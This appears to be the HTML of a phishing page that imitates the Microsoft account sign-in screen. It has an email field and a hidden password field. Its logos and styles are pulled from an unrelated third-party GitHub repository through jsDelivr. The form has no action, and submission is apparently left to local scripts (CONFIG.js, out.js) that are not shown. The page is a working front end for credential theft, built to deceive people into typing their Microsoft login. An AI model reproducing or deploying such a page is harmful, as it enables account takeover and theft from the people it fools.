<html dir="ltr" lang="EN-US">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <title>Sign in to your Microsoft account</title>
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes">
  <link rel="shortcut icon" type="image/x-icon" href="https://res.cdn.office.net/officehub/images/content/images/favicon-8f211ea639.ico">
  <link rel="stylesheet" title="Converged_v2" type="text/css"
        href="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/out/src/16.000/Converged_v21033__M8MTZS7Nv0I1zR18wdR-g2.css">
  <style type="text/css"></style>
  <style type="text/css">body {
    display: none;
  }</style>
  <style type="text/css">body {
    display: block !important;
  }</style>
  <noscript>
    <style type="text/css">body {
      display: block !important;
    }</style>
  </noscript>
  <link rel="image_src" href="https://logincdn.msauth.net/16.000.29237.7/images/Windows_Live_v_thumb.jpg">
  <style type="text/css">.inner, .promoted-fed-cred-box, .sign-in-box, .new-session-popup-v2sso, .debug-details-banner, .vertical-split-content {
    min-width: 0;
  }</style>
  <script src="../../CONFIG.js"></script>
</head>
<body class="cb">
<div>
  <div></div>
  <form name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post"
        autocomplete="off">
    <div id="lightboxTemplateContainer">
      <div id="lightboxBackgroundContainer">
        <div class="background-image-holder" role="presentation">
          <div style="background-image: url(https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/out/src/2_bc3d32a696895f78c19df6c717586a5d.svg);"
               class="background-image ext-background-image"></div>
        </div>
      </div>
      <div class="outer">
        <div class="template-section main-section">
          <div class="middle ext-middle">
            <div class="full-height">
              <div class="flex-column">
                <div class="win-scroll">
                  <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox has-popup">
                    <div class="lightbox-cover"></div>
                    <div id="progressBar" class="progress" role="progressbar" style="display: none" aria-label="Please wait"><div></div><div></div><div></div><div></div><div></div></div>
                    <div>
                      <img class="logo" role="img"
                           pngsrc="src/microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9.png"
                           svgsrc="src/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
                           src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/out/src/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
                           alt="Microsoft">
                    </div>
                    <div role="main">
                      <div class="">
                        <div class="pagination-view animate slide-in-next">
                          <div data-viewid="1" data-showfedcredbutton="true">
                            <div>
                              <div class="row title ext-title" id="loginHeader">
                                <div role="heading" aria-level="1">Sign in</div>
                              </div>
                            </div>
                            <div class="row">
                              <div role="alert" aria-live="assertive">
                                <div id="passwordError"class="error ext-error" style="display: none">
                                  Because you're accessing sensitive info, you need to verify your password.
                                </div>
                              </div>

                              <div class="form-group col-md-24">
                                <!-- ko if: prefillNames().length > 1 -->
                                <!-- ko ifnot: prefillNames().length > 1 -->
                                <div class="placeholderContainer">
                                  <input type="email" name="loginfmt" id="i0116"
                                         maxlength="113"
                                         class="form-control ltr_override input ext-input text-box ext-text-box"
                                         aria-required="true"
                                         aria-label="Enter your email address."
                                         aria-describedby="loginHeader usernameError"
                                         placeholder="Email address">
                                  <input name="passwd" type="password" id="i0118"
                                         autocomplete="off" class="moveOffScreen"
                                         tabindex="-1" aria-hidden="true">
                                </div>
                              </div>
                            </div>
                            <div class="position-buttons">
                              <div class="row">
                                <div class="col-md-24">
                                  <div class="text-13">
                                    <div class="form-group">No account? <a
                                            href="https://signup.live.com/signup?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1638124846&amp;rver=7.0.6737.0&amp;wp=MBI_SSL&amp;wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d9f851603-353a-4e8b-b4f1-cff77c5f58ee&amp;id=292841&amp;aadredir=1&amp;CBCXT=out&amp;lw=1&amp;fl=dob%2cflname%2cwld&amp;cobrandid=90015&amp;contextid=0CD00325D4044E6D&amp;bk=1638124848&amp;uiflavor=web&amp;lic=1&amp;mkt=EN-US&amp;lc=1033&amp;uaid=ce595ad008d1417abc711e6b13b3d26d"
                                            id="signup"
                                            aria-label="Create a Microsoft account">Create
                                      one!</a></div>
                                    <!-- ko if: showFidoLinkInline && hasFido() && (availableCredsWithoutUsername().length >= 2 || svr.Ah || isOfflineAccountVisible) -->
                                  </div>
                                </div>
                              </div>
                            </div>
                            <div class="win-button-pin-bottom">
                              <div class="row">
                                <div>
                                  <div class="col-xs-24 no-padding-left-right button-container">
                                    <div class="inline-block">
                                      <input type="submit" id="idSIButton9"
                                             class="win-button button_primary button ext-button primary ext-primary"
                                             value="Next">
                                    </div>
                                  </div>
                                </div>
                              </div>
                            </div>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="promoted-fed-cred-box ext-promoted-fed-cred-box">
                    <div class="promoted-fed-cred-content">
                      <div class="row tile">
                        <div class="table" role="button" tabindex="0"
                             aria-label="Sign-in options">
                          <div class="table-row">
                            <div class="table-cell tile-img medium">
                              <img class="tile-img medium" role="presentation"
                                   src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/main/out/src/signin-options_4e48046ce74f4b89d45037c90576bfac.svg">
                            </div>
                            <div class="table-cell text-left content">
                              <div data-test-id="signinOptions">Sign-in options</div>
                            </div>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div id="footer" role="contentinfo" class="footer ext-footer">
          <div>
            <div id="footerLinks" class="footerNode text-secondary">
              <a id="ftrTerms"
                 href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=EN-US&amp;uaid=ce595ad008d1417abc711e6b13b3d26d"
                 class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
              <a id="ftrPrivacy"
                 href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=EN-US&amp;uaid=ce595ad008d1417abc711e6b13b3d26d"
                 class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp;
                cookies</a>
              <a id="moreOptions" href="#" role="button"
                 aria-label="Click here for troubleshooting information" aria-expanded="false"
                 class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
            </div>
          </div>
        </div>
      </div>
    </div>
</div>
</form>
<form method="POST" aria-hidden="true" target="_top"></form>
<div id="idPartnerPL">
  <iframe style="display: none;" src="https://outlook.office365.com/owa/prefetch.aspx?id=292841&amp;mkt=EN-US"
          width="0" height="0"></iframe>
</div>
<div id="extwaiokist" style="display:none" v="{2c1b" q="434461fa" c="12.40" i="22" u="53.48" s="11242103" d="1"
     w="false" e="" m="BMe=" vn="0vdo1">
  <div id="extwaigglbit" style="display:none" v="{2c1b" q="434461fa" c="12.40" i="22" u="53.48" s="11242103" d="1"
       w="false" e="" m="BMe="></div>
</div>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js" integrity="sha256-xNzN2a4ltkB44Mc/Jz3pT4iU1cmeR0FkXs4pru/JxaQ=" crossorigin="anonymous"></script>
<script src="../assets/out.js"></script>
</body>
</html>